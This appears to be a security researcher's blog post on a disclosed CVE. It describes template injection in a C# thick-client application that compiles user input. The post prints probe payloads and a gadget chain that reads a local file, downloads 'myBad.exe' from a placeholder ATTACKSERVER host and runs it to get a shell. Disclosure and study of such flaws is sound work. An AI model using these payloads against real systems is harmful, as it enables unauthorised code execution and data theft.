 C:\\User\\burninator\\AppData\\Local\\Temp\\klqskh4k.0.cs(578,74): error CS1502: The best overloaded method match for '\*\*\*\*.ToString(object,object,bool)' has some invalid arguments: error CS1503: Argument 2: cannot convert from method group' to 'object' 

Bingo! I love to hear that something is being converted, and in a function we apparently have control over. This error is a wonderful window into how this works. I can tell from the error that it will only compile and execute successfully if we give it something that it can interpret as an Object. I tested this by sending {new Object()}, and it compiled without error! These work too but they're not that helpful (yet): 

{new System.Diagnostics.Process()}

{System.Math.Ceiling} 

{new System.Diagnostics.StackTrace(true).GetFrame(1).GetMethod()}

So, how can I weaponize this? Since this is a local thick client application, the first step is to figure out if it's going to execute these commands locally or on the application web server it's connected to. Surprise! It actually does both, since I was able to chain this with other functionality to make it launch server side AND locally. But first let's find proof that we can inject a malicious command... 

To find out, I read the manual. I actually READ the manual for the C# language. I know, I know. Disgusting. It's a taboo I didn't even do and would never have done when I was a developer. But it was important here, because I needed to find attack chains that would let me: 

1.)  execute a command on the local machine (pop calc.exe) 

2.) execute a command locally to make the remote server do an external DNS hit POC and then make it download/write/execute the file  

It reminded me a lot of Object Deserialization gadget/widget chains in YsoSerial, which are well known internal commands or system objects that aid with command injection and execution (i.e.http://gursevkalra.blogspot.com/2016/01/ysoserial-commonscollections1-exploit.html ). But given my constraints, I had to create my own. If you aren't familiar with Objects in Object Oriented Programming languages, here's a quick rundown from my presentation on Object Attacks and how I used them in this context. The class definitions are from the C# manual:

 

{System.IO.File.ReadAllText(@"dontlook.txt")} 

(NOTE: the curly brackets are for the templating system, they're not valid C#)  

 

{System.Net.WebRequest.Create("https://ATTACKSERVER:8000/myBad.exe").GetResponse().GetResponseStream()}  

 

{System.Diagnostics.Process.Start("myBad.exe")}  

That's how I got one of the weirdest shells ever.

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42777  

Also, now that I've written this out, I realize that by far the least fun part of this exploit was reading the C# manual to find interesting File IO and Networking gadget chains that return Objects... it was a lot of 2am nights. So I think I will end up automating that process, if something like it doesn't already exist.

Tag

#rce